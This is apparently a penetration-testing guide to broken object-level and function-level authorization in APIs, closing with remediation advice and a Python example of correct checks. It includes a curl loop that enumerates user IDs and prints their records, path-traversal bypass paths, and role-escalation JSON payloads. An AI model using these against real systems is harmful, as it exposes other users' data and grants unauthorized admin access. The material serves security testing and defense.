API Security: OWASP API1 (BOLA) and API5 (BFLA)

Authorization Testing

Authorization flaws are the most common and critical API vulnerabilities. They occur when the API fails to verify if the authenticated user has permission to access the requested resource or function.

BOLA - Broken Object Level Authorization

BOLA occurs when an API doesn't verify if the user has permission to access a specific object (like a user record, order, or document) based on the ID provided in the request.

1. Identify Endpoints with IDs

Look for endpoints that take an ID as a parameter.

```http
GET /api/users/1001
GET /api/orders/5001
GET /api/documents/doc-abc
```

2. Change IDs

Try changing the ID to access another user's data.

```http
GET /api/users/1002
GET /api/orders/5002
GET /api/documents/doc-xyz
```

3. Test Different ID Formats

Some APIs accept several ID formats for the same object, and each format may be handled by a different code path with its own authorization check.

```http
GET /api/users/1             # Sequential integer
GET /api/users/00001         # Padded integer
GET /api/users/user-uuid-here # UUID
GET /api/users/admin         # Username as ID
GET /api/users/user@email.com # Email as ID
```

4. ID Enumeration

Script the enumeration of IDs to find valid objects.

```bash
# TOKEN holds the bearer token of the test account being used
for id in {1..1000}; do
  response=$(curl -s -H "Authorization: Bearer $TOKEN" \
    https://api.target.com/api/users/$id)
  # Any response that is not a "not found" message is treated as a valid object
  if [[ $response != *"not found"* ]]; then
    echo "Found: $id"
    echo "$response"
  fi
done
```

5. Test All CRUD Operations

Don't just test GET requests. Try to modify or delete other users' data.

```http
GET    /api/users/1002
PUT    /api/users/1002
DELETE /api/users/1002
PATCH  /api/users/1002
```

BFLA - Broken Function Level Authorization

BFLA occurs when an API doesn't verify if the user has permission to access a specific function (like an admin endpoint).

1. Identify Privileged Endpoints

Look for endpoints that suggest administrative functionality.

  • /api/admin/users
  • /api/admin/config
  • /api/admin/logs
  • /api/internal/debug
  • /api/management/settings
  • /api/v1/admin/export

2. Access with Low Privileges

Try to access these endpoints with a regular user token.

```bash
curl -H "Authorization: Bearer $USER_TOKEN" \
  https://api.target.com/api/admin/users
```

3. HTTP Method Manipulation

If GET is blocked, try other methods like POST or PUT.

```bash
curl -X POST -H "Authorization: Bearer $USER_TOKEN" \
  https://api.target.com/api/admin/users
```

4. Path Manipulation

Try to bypass filters by manipulating the URL path.

  • /api/users/../admin/config
  • /api/v1/users/../../admin/users
  • /api/ADMIN/users
  • /api/Admin/users

5. Parameter-Based Escalation

Try to inject parameters that might elevate privileges.

```http
POST /api/users
Content-Type: application/json

{"name": "test", "role": "admin"}
```

Other common payloads:

```json
{"name": "test", "isAdmin": true}
{"name": "test", "permissions": ["admin", "write", "delete"]}
```

6. Role/Permission Changes

Try to update your own role or permissions.

```http
PUT /api/users/1001
Content-Type: application/json

{"role": "admin"}
```

Remediation

Defense Strategies

  • Implement a consistent authorization mechanism that validates the user's permission for every requested function and object.
  • Use random, unpredictable IDs (UUIDs) instead of sequential integers to make enumeration harder; this complements the authorization check but never replaces it.
  • Check authorization in the business logic layer, not just at the API gateway.
  • Write unit tests to verify that unauthorized users cannot access privileged endpoints.
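
As an added example (not code from the original page), the following minimal Python request dispatcher applies the defenses listed above in one place: an object-level check on /api/users/<id>, a function-level check on privileged path prefixes that holds for every HTTP method and survives "../" and case tricks, and an allow-list that drops client-supplied role fields. The sample records, the USERS table and ADMIN_PREFIXES are constructed for the illustration.

```python
import posixpath
from dataclasses import dataclass, field

# Constructed sample data (not from the page): user records keyed by id.
USERS = {
    1001: {"name": "alice", "role": "user"},
    1002: {"name": "bob", "role": "user"},
    9000: {"name": "root", "role": "admin"},
}
WRITABLE_FIELDS = {"name"}  # "role", "isAdmin", "permissions" are never client-writable
ADMIN_PREFIXES = ("/api/admin/", "/api/internal/", "/api/management/")
NOT_FOUND = (404, {"error": "not found"})  # identical whether missing or not yours


@dataclass
class Request:
    method: str
    path: str
    caller_id: int  # identity comes from the verified token, never from the URL or body
    body: dict = field(default_factory=dict)


def handle(req: Request) -> tuple[int, dict]:
    caller = USERS.get(req.caller_id)
    if caller is None:
        return 401, {"error": "unauthenticated"}
    # Collapse "../" segments, and match policy case-insensitively, before any check.
    path = posixpath.normpath(req.path)
    is_admin = caller["role"] == "admin"
    # Function-level (BFLA): privileged prefixes need the admin role for every method.
    if path.lower().startswith(ADMIN_PREFIXES):
        return (200, {"users": sorted(USERS)}) if is_admin else (403, {"error": "forbidden"})
    # Object-level (BOLA): /api/users/<id> is visible only to its owner or an admin.
    if path.startswith("/api/users/"):
        raw_id = path.removeprefix("/api/users/")
        target = USERS.get(int(raw_id)) if raw_id.isdigit() else None
        if target is None or (int(raw_id) != req.caller_id and not is_admin):
            return NOT_FOUND  # same answer as a missing object, so IDs cannot be enumerated
        if req.method == "GET":
            return 200, target
        if req.method in ("PUT", "PATCH"):
            # Mass-assignment guard: silently drop every field outside the allow-list.
            target.update({k: v for k, v in req.body.items() if k in WRITABLE_FIELDS})
            return 200, target
        if req.method == "DELETE":
            USERS.pop(int(raw_id))
            return 204, {}
    return NOT_FOUND
```

The same handler answers 404 for another user's record and for a non-existent one, which is what defeats the "not found" substring test in the enumeration loop above.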